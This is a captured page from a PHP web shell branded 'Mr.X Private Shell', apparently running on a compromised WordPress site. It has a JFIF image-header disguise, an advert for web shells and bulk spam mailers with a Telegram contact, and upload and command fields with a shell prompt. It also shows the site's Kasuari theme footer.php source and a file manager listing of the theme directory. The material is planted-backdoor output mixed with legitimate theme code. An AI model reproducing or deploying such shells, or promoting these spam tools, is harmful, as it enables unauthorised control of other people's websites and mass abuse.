����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

chassiw@216.73.217.25: ~ $
<!-- FOOTER -->
<?php if ( class_exists( 'Redux' )) {
$options = get_option('kasuari_framework');
$kasuari_footer_style_type 	= $options['footer_style_type'];
$kasuari_footer_layout 		= $options['footer_layout'];

$kasuari_footer_first_display 	= $options['footer_first_display'];
$kasuari_foot_col1_align 		= $options['foot_col1_align'];

$kasuari_footer_second_display 	= $options['footer_second_display'];
$kasuari_foot_col2_align 		= $options['foot_col2_align'];

$kasuari_footer_third_display 	= $options['footer_third_display'];
$kasuari_foot_col3_align 		= $options['foot_col3_align'];

$kasuari_footer_fourth_display 	= $options['footer_fourth_display'];
$kasuari_foot_col4_align 		= $options['foot_col4_align'];
} ?>

<footer id="footer" class="footer<?php if(class_exists( 'Redux' ) && $kasuari_footer_style_type == 'fixed-footer') { ?> fixed-footer<?php } if(!class_exists( 'Redux' )) { ?> no-redux<?php } ?> clearfix">
	<div class="footer-wrap clearfix">
		<?php if ( class_exists( 'Redux' ) && is_active_sidebar( 'footer-1' ) || 
		class_exists( 'Redux' ) && is_active_sidebar( 'footer-2' ) || 
		class_exists( 'Redux' ) && is_active_sidebar( 'footer-3' ) || 
		class_exists( 'Redux' ) && is_active_sidebar( 'footer-4' ) ) { ?>
		<div class="footer-widget-wrapper">
			<div class="container">
				<div class="row clearfix">
					<?php kasuari_footer_widget(); ?>
				</div>
			</div>
		</div>
		<?php } ?>
		
		<div class="footer-bottom clearfix">
			<div class="container">	
				<div class="row">
					<?php if ( class_exists( 'Redux' )) {
					switch ($kasuari_footer_layout) { 

						case '1column-footer' : ?>
						<div class="foot-col column column-1 item-col-1 <?php echo esc_attr($kasuari_footer_first_display).' '.esc_attr($kasuari_foot_col1_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-first-column' ); ?>
						</div>
						<?php break;

						case '2column-footer' : ?>
						<div class="foot-col column column-2 item-col-1 <?php echo esc_attr($kasuari_footer_first_display).' '.esc_attr($kasuari_foot_col1_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-first-column' ); ?>
						</div>
						<div class="foot-col column column-2 item-col-2 <?php echo esc_attr($kasuari_footer_second_display).' '.esc_attr($kasuari_foot_col2_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-second-column' ); ?>
						</div>
						<?php break;

						case '3column-footer' : ?>
						<div class="foot-col column column-3 item-col-1 <?php echo esc_attr($kasuari_footer_first_display).' '.esc_attr($kasuari_foot_col1_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-first-column' ); ?>
						</div>
						<div class="foot-col column column-3 item-col-2 <?php echo esc_attr($kasuari_footer_second_display).' '.esc_attr($kasuari_foot_col2_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-second-column' ); ?>
						</div>
						<div class="foot-col column column-3 item-col-3 <?php echo esc_attr($kasuari_footer_third_display).' '.esc_attr($kasuari_foot_col3_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-third-column' ); ?>
						</div>
						<?php break;

						case '4column-footer' : ?>
						<div class="foot-col column column-4 item-col-1 <?php echo esc_attr($kasuari_footer_first_display).' '.esc_attr($kasuari_foot_col1_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-first-column' ); ?>
						</div>
						<div class="foot-col column column-4 item-col-2 <?php echo esc_attr($kasuari_footer_second_display).' '.esc_attr($kasuari_foot_col2_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-second-column' ); ?>
						</div>
						<div class="foot-col column column-4 item-col-3 <?php echo esc_attr($kasuari_footer_third_display).' '.esc_attr($kasuari_foot_col3_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-third-column' ); ?>
						</div>
						<div class="foot-col column column-4 item-col-4 <?php echo esc_attr($kasuari_footer_fourth_display).' '.esc_attr($kasuari_foot_col4_align); ?> clearfix">
							<?php kasuari_footer_part('footer/footer-fourth-column' ); ?>
						</div>
						<?php break;

					}
					}
					else { 
						$kasuari_theme_name = wp_get_theme(); ?>
						<div class="foot-col column column-1 item-col-1 text-center clearfix">
						<p><a href="<?php echo esc_url($kasuari_theme_name->get( 'ThemeURI' )); ?>"><?php echo esc_html($kasuari_theme_name->get( 'Name' )); ?></a><?php esc_html_e( ' &copy; Copyright ', 'kasuari' ); ?><?php echo date("Y"); ?><?php esc_html_e( ', Built by Themes Awesome', 'kasuari' ); ?></p>
						</div>
					<?php } ?>
				</div>
			</div>
		</div>
	</div>
</footer>
<!-- FOOTER END -->

</div>
<!-- MAIN WRAPPER END -->

<?php wp_footer(); ?>

</body>
</html>

Filemanager

Name Type Size Permission Actions
css Folder 0755
img Folder 0755
inc Folder 0755
js Folder 0755
languages Folder 0755
plugins Folder 0755
template Folder 0755
404.php File 738 B 0644
archive.php File 1.17 KB 0644
author.php File 2.47 KB 0644
category.php File 1.81 KB 0644
changelog.txt File 814 B 0644
class-tgm-plugin-activation.php File 161.79 KB 0644
class-tgm.php File 8.08 KB 0644
class.theme-modules.php File 0 B 0644
comments.php File 1.72 KB 0644
footer-no-footer.php File 97 B 0644
footer.php File 4.81 KB 0644
functions.php File 22.88 KB 0644
header.php File 7.71 KB 0644
index.php File 3.09 KB 0644
license.txt File 15.05 KB 0644
page.php File 363 B 0644
readme.txt File 638 B 0644
screenshot.png File 301.63 KB 0644
search.php File 1.51 KB 0644
searchform-def.php File 456 B 0644
searchform.php File 1.63 KB 0644
sidebar.php File 323 B 0644
single.php File 2.45 KB 0644
style.css File 112.98 KB 0644